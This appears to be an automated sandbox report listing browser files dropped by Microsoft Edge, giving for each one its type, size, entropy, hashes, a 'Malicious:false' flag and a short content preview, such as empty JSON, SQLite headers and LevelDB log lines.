                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40
                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):36864
                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40
                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):80
                                                                                                                                              Entropy (8bit):3.4921535629071894
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                              MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                              SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                              SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                              SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):418
                                                                                                                                              Entropy (8bit):5.195766097545102
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VSDvaYebvqBZFUtfSVL/5SIaz5JYebvqBaJ:7VWaYebvygfA7MJYebvL
                                                                                                                                              MD5:E3BB3B9230B9DE71E303ABBD9EB10CFE
                                                                                                                                              SHA1:5F44EDB412B91B4D196844B196274121D14E2C16
                                                                                                                                              SHA-256:E31892B1DFE12D8C765FDEA921749A22160C305E0B4DE238012740FBB4FBC5F5
                                                                                                                                              SHA-512:A6A595E084999223E85F4BF5278AA844D1BD1534D0DC8F17493840C275DA28C1E2DC5E58955E737B4E604A32F3FF25D37AE2EAC12F7C1C2D23B21D5C43B57603
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:34:13.048 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/03-11:34:13.049 1e54 Recovering log #3.2025/01/03-11:34:13.052 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):418
                                                                                                                                              Entropy (8bit):5.195766097545102
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VSDvaYebvqBZFUtfSVL/5SIaz5JYebvqBaJ:7VWaYebvygfA7MJYebvL
                                                                                                                                              MD5:E3BB3B9230B9DE71E303ABBD9EB10CFE
                                                                                                                                              SHA1:5F44EDB412B91B4D196844B196274121D14E2C16
                                                                                                                                              SHA-256:E31892B1DFE12D8C765FDEA921749A22160C305E0B4DE238012740FBB4FBC5F5
                                                                                                                                              SHA-512:A6A595E084999223E85F4BF5278AA844D1BD1534D0DC8F17493840C275DA28C1E2DC5E58955E737B4E604A32F3FF25D37AE2EAC12F7C1C2D23B21D5C43B57603
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:34:13.048 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/03-11:34:13.049 1e54 Recovering log #3.2025/01/03-11:34:13.052 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):321
                                                                                                                                              Entropy (8bit):5.182112971582099
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErUS1M+q2PRN23oH+TcwtpIFUtfErUJDmZmw5ErUJDpMVkwORN23oH+TcwtaQ:7VBOM+vaYebmFUtfBJq/5BJ1MV5JYeb7
                                                                                                                                              MD5:77CCC7AAD030AEB1346DA8BD64426579
                                                                                                                                              SHA1:6AF21463D99815A207BFBB04F0354F7251545A49
                                                                                                                                              SHA-256:B5816C16FA51A7486517EFF022657BA8384722D22B62A2C18C3A4144865E1362
                                                                                                                                              SHA-512:C38B0016115C07BC74BF88D6BF8359C415F404D8150C042885AE53312535FC844485FB1EF20A110A406541ACCBC596D9B585F68F6C70C9E2E35BB7A18C0A5A2F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.115 bfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/03-11:33:57.116 bfc Recovering log #3.2025/01/03-11:33:57.116 bfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):321
                                                                                                                                              Entropy (8bit):5.182112971582099
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErUS1M+q2PRN23oH+TcwtpIFUtfErUJDmZmw5ErUJDpMVkwORN23oH+TcwtaQ:7VBOM+vaYebmFUtfBJq/5BJ1MV5JYeb7
                                                                                                                                              MD5:77CCC7AAD030AEB1346DA8BD64426579
                                                                                                                                              SHA1:6AF21463D99815A207BFBB04F0354F7251545A49
                                                                                                                                              SHA-256:B5816C16FA51A7486517EFF022657BA8384722D22B62A2C18C3A4144865E1362
                                                                                                                                              SHA-512:C38B0016115C07BC74BF88D6BF8359C415F404D8150C042885AE53312535FC844485FB1EF20A110A406541ACCBC596D9B585F68F6C70C9E2E35BB7A18C0A5A2F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.115 bfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/03-11:33:57.116 bfc Recovering log #3.2025/01/03-11:33:57.116 bfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):131072
                                                                                                                                              Entropy (8bit):0.0033769341339387224
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ImtVu0Td/x/tJL:IiVu0J/N
                                                                                                                                              MD5:757755C82BBCB9CDC86CCD4ACEF2496C
                                                                                                                                              SHA1:53B78736DCA65B019D53CD7CFAE6961C4B3B7574
                                                                                                                                              SHA-256:8B8AE2BA6CF824A4EAC9253082A66B0D9FCF454BC68AFC1EF0A9CFDCF23FB025
                                                                                                                                              SHA-512:AB9C9E3DFE2653755C0F462C7544A1BE3BCE88D148961C3A5332695E67598E595AE023A6C1ED6829936F4E7C1C7A1E8E7B9C24B28B719C228998B3B78559F4E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:VLnk.....?.......v|..lON................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):196608
                                                                                                                                              Entropy (8bit):1.2651370587615858
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:8/2qOB1nxCkMASAELyKOMq+8mKQ0MPVumA:Bq+n0JA9ELyKOMq+8m5hM
                                                                                                                                              MD5:41F70530B1F97C6631F3FBE9E6706853
                                                                                                                                              SHA1:DF30E92EC2ABE407547C05A01619EB8F8A909655
                                                                                                                                              SHA-256:452BCD0C64D8BC388BE71B84CEE66B0E3E0F13C2F543F816D54D2A85118769F3
                                                                                                                                              SHA-512:CC524C082627C486EF775BBFB442D6AD96E67CBCEAC01706C04295F638AF0872FB220299574ACA42D355F8B60B0637194BFCB426296E8C3866FABB475779087F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40960
                                                                                                                                              Entropy (8bit):0.41235120905181716
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                              MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                              SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                              SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                              SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11755
                                                                                                                                              Entropy (8bit):5.190465908239046
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                              MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                              SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                              SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                              SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28672
                                                                                                                                              Entropy (8bit):0.3410017321959524
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                              MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                              SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                              SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                              SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):39660
                                                                                                                                              Entropy (8bit):5.562632959711224
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:DBdt397pLGLhDFWP2EftL8F1+UoAYDCx9Tuqh0VfUC9xbog/OV23BKF6Jrwq66dg:DBdt3rchDFWP2EftLu1ja73B066q66rK
                                                                                                                                              MD5:2C891D47F673F094B3CF64274B443308
                                                                                                                                              SHA1:7C1102B5DF0F09496D3EFA4D078DAAE86D57B5C3
                                                                                                                                              SHA-256:3552D3E48EC944DA66ADE051DDF1C7996866DD5333F428E7BC8B5786AA542FF5
                                                                                                                                              SHA-512:F4166139497ADD954A11809CCF913EEABD77B92270BE34CAD829AC2EA0FE969799D974143CC0309DA00A02A13561DE5957032AC91D9910E805105EEE3F01E89E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380395637045030","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380395637045030","location":5,"ma
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32768
                                                                                                                                              Entropy (8bit):0.053939291573519337
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:GtStut94lcnp3Stut94lcnfR9XCChslotGLNl0ml/Vl/XoQXEl:Mt2upJt2ufLpEjVl/PvoQ
                                                                                                                                              MD5:E2D26EE890440DFC4613ECD8E003117B
                                                                                                                                              SHA1:A6E3FD14C08EEC125505BD9F1F64FF0E4A6BA879
                                                                                                                                              SHA-256:1AD7714BBAB3CABE6272BA7B03A402FF2E217F7A26EEFEF5A7D7C176A744D66A
                                                                                                                                              SHA-512:48CF9C1BE971110BA2E3C0DF973C4F893997387875AF5452BDAA54715D83663C35FE892FE9F0FD23CD81044F0088FC1E6B0C520D7095DDEC6E539B32AD711B2A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..-.....................=.=.<.^..>l_..\....w[...-.....................=.=.<.^..>l_..\....w[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):86552
                                                                                                                                              Entropy (8bit):0.8690917933914207
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cTXzxMnlO+jDcbX+on9VAKAFXX+p2VAKAFXX++rxOqVAKAFXX+ZDnUYVAKAFXX+g:cvxM/ZdNsXNsgO5NsZCNsfRif
                                                                                                                                              MD5:73049435A9C0136378E21D668600F517
                                                                                                                                              SHA1:726296D0365ADAB6F629DCF0ABA7DAA34EF0A414
                                                                                                                                              SHA-256:3C04EC462A7F76EA0A55D414384A038FE19AE6956A81598017F25FCE922D93DE
                                                                                                                                              SHA-512:F079F80FE3E6968FD496D452C8C29D051248857AFDB6C546B0B2A3C31A56FE8B4CFFA25BD35F08681DB9F2CBA2DCDB54EF7B779743DC6082BA15872C38908D65
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:7....-..........^..>l_.....q..$.........^..>l_..X....9I4SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):580
                                                                                                                                              Entropy (8bit):3.7490759696167704
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:fmtlc8pOuuuuuuuuuuuuuuuu1gll8qO8f:fmXr3l8q7
                                                                                                                                              MD5:3E66D2734A1A9FA600E5C422EE557F50
                                                                                                                                              SHA1:AFF47BC340DEC2614A0B32D6757F99BEA381F5AE
                                                                                                                                              SHA-256:B274942E844C5A9B4AF1AEBE454F9CD3F3C5524D82AAAE06C9CA59DDF2E05F22
                                                                                                                                              SHA-512:C30D2ECC48C30151C4BBC39CE9BFD3B263358650D8EF48FE64277B06C3E01B284BC756FA417D2D9FBBBC69EF6C0314183B3389AE489CE7282C10E1A7227CDEA6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:A..r.................20_1_1...1.,U.................20_1_1...1?.Q;0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................5.;...............#38_h.......6.Z..W.F.......y.......y..........V.e...................00................39_config..........6.....n ...1
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.232109020492768
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEE71L+q2PRN23oH+TcwtfrK+IFUtfEE7jKWZmw5EE71LVkwORN23oH+TcwtfR:7VV9+vaYeb23FUtfVjKW/5V9V5JYeb3J
                                                                                                                                              MD5:2B2AFA4319D1573F6298BB711762EAF5
                                                                                                                                              SHA1:5DFBAFE286FFCBE9B67DA9FFE43692CAC893990A
                                                                                                                                              SHA-256:B44F52B42ACA843FCA171609F77009420AE82ED9E4A7E854B9DBA5DBECF8813B
                                                                                                                                              SHA-512:9CEAEB6FDA013A4F1B4A7F743F98BED9D8A5E70E9244E7CF782BEB132D7D66ECD2ADFF5534506AF2BF29F7435152A1E86F1096ED304EDC04DB59D9E02D019971
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.446 b3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/03-11:33:57.446 b3c Recovering log #3.2025/01/03-11:33:57.446 b3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.232109020492768
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEE71L+q2PRN23oH+TcwtfrK+IFUtfEE7jKWZmw5EE71LVkwORN23oH+TcwtfR:7VV9+vaYeb23FUtfVjKW/5V9V5JYeb3J
                                                                                                                                              MD5:2B2AFA4319D1573F6298BB711762EAF5
                                                                                                                                              SHA1:5DFBAFE286FFCBE9B67DA9FFE43692CAC893990A
                                                                                                                                              SHA-256:B44F52B42ACA843FCA171609F77009420AE82ED9E4A7E854B9DBA5DBECF8813B
                                                                                                                                              SHA-512:9CEAEB6FDA013A4F1B4A7F743F98BED9D8A5E70E9244E7CF782BEB132D7D66ECD2ADFF5534506AF2BF29F7435152A1E86F1096ED304EDC04DB59D9E02D019971
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.446 b3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/03-11:33:57.446 b3c Recovering log #3.2025/01/03-11:33:57.446 b3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):816
                                                                                                                                              Entropy (8bit):4.0647916882227655
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                              MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                              SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                              SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                              SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):335
                                                                                                                                              Entropy (8bit):5.16906066313061
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErHW+L+q2PRN23oH+TcwtfrzAdIFUtfEoNKWZmw5EobLVkwORN23oH+Tcwtfa:7VS2i+vaYeb9FUtftKW/5/V5JYeb2J
                                                                                                                                              MD5:3725937080CEE690B694264481DA950B
                                                                                                                                              SHA1:B472835568952ABB34ED7E83CCC0BE7513E40123
                                                                                                                                              SHA-256:C8D25DE9F28F8A8C9E14FBB08BDD8BA849FC45CF532120DF8E5A8FD72A12023A
                                                                                                                                              SHA-512:EED10E5F9C53914B3C54EED96991D77E316C155166948D995DD2A8C5EC96DB17208A9327EE3E28F80BA3BBD082206F3B9C84C2635A30AF13B955CF7CCC0CC2E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
